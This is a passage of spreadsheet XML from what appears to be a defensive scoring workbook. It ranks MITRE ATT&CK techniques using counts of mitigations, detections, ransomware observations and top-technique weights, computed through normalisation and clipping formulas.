        <f>IF(AF37="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH37" s="25" t="str" cm="1">
        <f t="array" ref="AH37">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC37)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI37" s="25">
        <f>IF(AH37="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ37" s="25" t="str" cm="1">
        <f t="array" ref="AJ37">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC37)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK37" s="25">
        <f>IF(AJ37="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL37" s="25" t="str" cm="1">
        <f t="array" ref="AL37">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC37)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM37" s="25">
        <f>IF(AL37="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN37" s="58">
        <v>8</v>
      </c>
      <c r="AO37" s="51">
        <v>1</v>
      </c>
      <c r="AP37" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.29789018892895236</v>
      </c>
      <c r="AQ37" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10407840754095239</v>
      </c>
      <c r="AR37" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10407840754095239</v>
      </c>
      <c r="AS37" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AT37" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AU3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8" spans="1:47" ht="48">
      <c r="A38" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.20187943915666667</v>
      </c>
      <c r="B38" s="25">
        <f>SUM(H38,M38,V38)*(1+SUM(AE38,AG38,AI38,AK38,AM38))</f>
        <v>1.3521277249000001</v>
      </c>
      <c r="C38" s="25" t="s">
        <v>232</v>
      </c>
      <c r="D38" s="25" t="s">
        <v>233</v>
      </c>
      <c r="E38" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F38" s="51">
        <v>3</v>
      </c>
      <c r="G38" s="51">
        <v>4</v>
      </c>
      <c r="H38" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I38">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J38">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K38">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.4</v>
      </c>
      <c r="L38">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="M38" s="44">
        <v>0.10949453000000001</v>
      </c>
      <c r="N38" s="51">
        <v>0</v>
      </c>
      <c r="O38" s="51">
        <v>3</v>
      </c>
      <c r="P38" s="51">
        <v>3</v>
      </c>
      <c r="Q38" s="51">
        <v>1</v>
      </c>
      <c r="R38" s="52" t="s">
        <v>234</v>
      </c>
      <c r="S38" s="51">
        <v>28</v>
      </c>
      <c r="T38" s="52" t="s">
        <v>235</v>
      </c>
      <c r="U38" s="51">
        <v>33</v>
      </c>
      <c r="V38" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.55714285714285716</v>
      </c>
      <c r="W38">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>61</v>
      </c>
      <c r="X38">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>1.1090909090909091</v>
      </c>
      <c r="Y38">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="Z38">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA38">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB38">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC38" s="29" t="s">
        <v>236</v>
      </c>
      <c r="AD38" s="25" t="str" cm="1">
        <f t="array" ref="AD38">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC38)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE38" s="25">
        <f>IF(AD38="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF38" s="25" t="str" cm="1">
        <f t="array" ref="AF38">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC38)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG38" s="25">
        <f>IF(AF38="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH38" s="25" t="str" cm="1">
        <f t="array" ref="AH38">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC38)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI38" s="25">
        <f>IF(AH38="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ38" s="25" t="str" cm="1">
        <f t="array" ref="AJ38">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC38)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK38" s="25">
        <f>IF(AJ38="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL38" s="25" t="str" cm="1">
        <f t="array" ref="AL38">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC38)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM38" s="25">
        <f>IF(AL38="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN38" s="60">
        <v>2</v>
      </c>
      <c r="AO38" s="51">
        <v>1</v>
      </c>
      <c r="AP38" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.20187943915666667</v>
      </c>
      <c r="AQ38" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.45070924163333337</v>
      </c>
      <c r="AR38" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.45070924163333337</v>
      </c>
      <c r="AS38" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT38" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU3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9" spans="1:47" ht="32.1">
      <c r="A39" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.6363420873333341E-2</v>
      </c>
      <c r="B39" s="25">
        <f>SUM(H39,M39,V39)*(1+SUM(AE39,AG39,AI39,AK39,AM39))</f>
        <v>0.9636342087333335</v>
      </c>
      <c r="C39" s="25" t="s">
        <v>237</v>
      </c>
      <c r="D39" s="25" t="s">
        <v>238</v>
      </c>
      <c r="E39" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F39" s="51">
        <v>8</v>
      </c>
      <c r="G39" s="51">
        <v>4</v>
      </c>
      <c r="H39" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.60000000000000009</v>
      </c>
      <c r="I39">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.8</v>
      </c>
      <c r="J39">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.8</v>
      </c>
      <c r="K39">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.4</v>
      </c>
      <c r="L39">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="M39" s="44">
        <v>0.10548937999999999</v>
      </c>
      <c r="N39" s="51">
        <v>0</v>
      </c>
      <c r="O39" s="51">
        <v>2</v>
      </c>
      <c r="P39" s="51">
        <v>1</v>
      </c>
      <c r="Q39" s="51">
        <v>1</v>
      </c>
      <c r="R39" s="51"/>
      <c r="S39" s="51">
        <v>0</v>
      </c>
      <c r="T39" s="51"/>
      <c r="U39" s="51">
        <v>0</v>
      </c>
      <c r="V39" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W39">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X39">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y39">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z39">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA39">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB39">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC39" s="29" t="s">
        <v>239</v>
      </c>
      <c r="AD39" s="25" t="str" cm="1">
        <f t="array" ref="AD39">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC39)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE39" s="25">
        <f>IF(AD39="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF39" s="25" t="str" cm="1">
        <f t="array" ref="AF39">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC39)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG39" s="25">
        <f>IF(AF39="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH39" s="25" t="str" cm="1">
        <f t="array" ref="AH39">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC39)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI39" s="25">
        <f>IF(AH39="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ39" s="25" t="str" cm="1">
        <f t="array" ref="AJ39">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC39)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK39" s="25">
        <f>IF(AJ39="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL39" s="25" t="str" cm="1">
        <f t="array" ref="AL39">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC39)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM39" s="25">
        <f>IF(AL39="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN39" s="60">
        <v>0</v>
      </c>
      <c r="AO39" s="51">
        <v>0</v>
      </c>
      <c r="AP39" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.6363420873333341E-2</v>
      </c>
      <c r="AQ39" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.32121140291111117</v>
      </c>
      <c r="AR39" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.32121140291111117</v>
      </c>
      <c r="AS39" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT39" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU3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0" spans="1:47" ht="32.1">
      <c r="A40" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.28512037895666664</v>
      </c>
      <c r="B40" s="25">
        <f>SUM(H40,M40,V40)*(1+SUM(AE40,AG40,AI40,AK40,AM40))</f>
        <v>1.1845371228999999</v>
      </c>
      <c r="C40" s="25" t="s">
        <v>240</v>
      </c>
      <c r="D40" s="25" t="s">
        <v>241</v>
      </c>
      <c r="E40" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F40" s="51">
        <v>5</v>
      </c>
      <c r="G40" s="51">
        <v>5</v>
      </c>
      <c r="H40" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="I40">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.5</v>
      </c>
      <c r="J40">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="K40">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L40">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M40" s="44">
        <v>0.10491513</v>
      </c>
      <c r="N40" s="51">
        <v>0</v>
      </c>
      <c r="O40" s="51">
        <v>18</v>
      </c>
      <c r="P40" s="51">
        <v>8</v>
      </c>
      <c r="Q40" s="51">
        <v>0</v>
      </c>
      <c r="R40" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S40" s="51">
        <v>2</v>
      </c>
      <c r="T40" s="51" t="s">
        <v>242</v>
      </c>
      <c r="U40" s="51">
        <v>15</v>
      </c>
      <c r="V40" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="W40">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X40">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y40">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z40">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>26</v>
      </c>
      <c r="AA40">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.26</v>
      </c>
      <c r="AB40">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.26</v>
      </c>
      <c r="AC40" s="29" t="s">
        <v>243</v>
      </c>
      <c r="AD40" s="25" t="str" cm="1">
        <f t="array" ref="AD40">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC40)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE40" s="25">
        <f>IF(AD40="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF40" s="25" t="str" cm="1">
        <f t="array" ref="AF40">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC40)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG40" s="25">
        <f>IF(AF40="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH40" s="25" t="str" cm="1">
        <f t="array" ref="AH40">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC40)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI40" s="25">
        <f>IF(AH40="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ40" s="25" t="str" cm="1">
        <f t="array" ref="AJ40">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC40)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK40" s="25">
        <f>IF(AJ40="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL40" s="25" t="str" cm="1">
        <f t="array" ref="AL40">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC40)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM40" s="25">
        <f>IF(AL40="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN40" s="60">
        <v>5</v>
      </c>
      <c r="AO40" s="51">
        <v>1</v>
      </c>
      <c r="AP40" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.28512037895666664</v>
      </c>
      <c r="AQ40" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.39484570763333332</v>
      </c>
      <c r="AR40" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.39484570763333332</v>
      </c>
      <c r="AS40" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT40" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU4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1" spans="1:47" ht="48">
      <c r="A41" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.170442914</v>
      </c>
      <c r="B41" s="25">
        <f>SUM(H41,M41,V41)*(1+SUM(AE41,AG41,AI41,AK41,AM41))</f>
        <v>0.37109580666666664</v>
      </c>
      <c r="C41" s="25" t="s">
        <v>244</v>
      </c>
      <c r="D41" s="25" t="s">
        <v>245</v>
      </c>
      <c r="E41" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F41" s="51">
        <v>1</v>
      </c>
      <c r="G41" s="51">
        <v>1</v>
      </c>
      <c r="H41" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I41">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J41">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K41">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L41">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M41" s="44">
        <v>0.10442914</v>
      </c>
      <c r="N41" s="51">
        <v>0</v>
      </c>
      <c r="O41" s="51">
        <v>12</v>
      </c>
      <c r="P41" s="51">
        <v>4</v>
      </c>
      <c r="Q41" s="51">
        <v>5</v>
      </c>
      <c r="R41" s="52" t="s">
        <v>246</v>
      </c>
      <c r="S41" s="51">
        <v>4</v>
      </c>
      <c r="T41" s="51" t="s">
        <v>247</v>
      </c>
      <c r="U41" s="51">
        <v>3</v>
      </c>
      <c r="V41" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.16666666666666666</v>
      </c>
      <c r="W41">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X41">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y41">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z41">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>21</v>
      </c>
      <c r="AA41">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.21</v>
      </c>
      <c r="AB41">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.21</v>
      </c>
      <c r="AC41" s="29" t="s">
        <v>141</v>
      </c>
      <c r="AD41" s="25" t="str" cm="1">
        <f t="array" ref="AD41">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC41)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE41" s="25">
        <f>IF(AD41="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF41" s="25" t="str" cm="1">
        <f t="array" ref="AF41">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC41)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG41" s="25">
        <f>IF(AF41="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH41" s="25" t="str" cm="1">
        <f t="array" ref="AH41">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC41)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI41" s="25">
        <f>IF(AH41="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ41" s="25" t="str" cm="1">
        <f t="array" ref="AJ41">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC41)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK41" s="25">
        <f>IF(AJ41="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL41" s="25" t="str" cm="1">
        <f t="array" ref="AL41">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC41)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM41" s="25">
        <f>IF(AL41="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN41" s="52">
        <v>4</v>
      </c>
      <c r="AO41" s="51">
        <v>1</v>
      </c>
      <c r="AP41" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.170442914</v>
      </c>
      <c r="AQ41" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12369860222222222</v>
      </c>
      <c r="AR41" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12369860222222222</v>
      </c>
      <c r="AS41" s="25">
